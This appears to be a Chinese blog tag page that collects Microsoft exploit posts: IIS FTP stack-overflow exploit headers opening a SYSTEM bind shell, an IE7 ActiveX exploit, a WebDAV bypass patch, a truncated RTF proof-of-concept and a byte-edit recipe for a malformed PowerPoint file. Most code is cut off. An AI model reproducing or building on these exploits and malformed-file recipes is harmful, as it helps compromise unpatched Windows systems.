标签 ‘Microsoft’ 下的日志

Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

EDB-ID: 13808
CVE: 2010-1885
OSVDB-ID: 65264
Author: Tavis Ormandy
Published: 2010-06-10
Verified: Yes
Exploit Code: Download
Vulnerable App: N/A

详细的看这里:http://www.exploit-db.com/exploits/13808/

Tags: ,

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

作者:Inking

因为一些字符问题,所以英文版的exp没法直接用到中文操作系统上,花了些时间修改了milw0rm上的exp,在自己的中、英文 Win2k sp4 虚拟机中测试都通过。
阅读全文 »

Tags: , , ,

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt
阅读全文 »

Tags: , , , ,

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
阅读全文 »

Tags: , , , ,

MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit

milw0rm.com [2009-07-10]

#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###############################################################################
阅读全文 »

Tags: , , ,

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
阅读全文 »

Tags: , , , ,

DOC 0day

作者:wordexp

这个doc的要利用有一定难度:

poc如下:

{\rtf1\ansi\ansicpg409\deff0\deflang1033
{\fonttbl{\f0\fmodern\fprq6\fcharset0 DOTUM;}}
{\stylesheet\stylesheet\stylesheet\stylesheet\………\stylesheet……………..{hi.baidu.com/wordexp\par }}
阅读全文 »

Tags: , , , ,

PPT 0day

作者:wordexp

ppt “0day”构造方式:新键个PPT,找9f 0f 04 00 00 00,把后面的一字节改为03 00 00 00
TextHeaderAtom (3999,9f0f,atom):这个记录表示后的文字原子的意义(可以用来区分文字是否分隔成不同块)
值 名称       说明
0 TITLE            母版标题栏文本.
1 BODY            母版正文栏文本.
2 NOTES          注解文本.
4 OTHER         任何其它文本
5 CENTERBODY   正文栏文件.
6 CENTERTITLE   标题栏文本.
7 HALFBODY        表格中的文本?Half-sized body placeholder shape text.
8 QUARTERBODY Quarter-sized body placeholder shape text.

Tags: , , , ,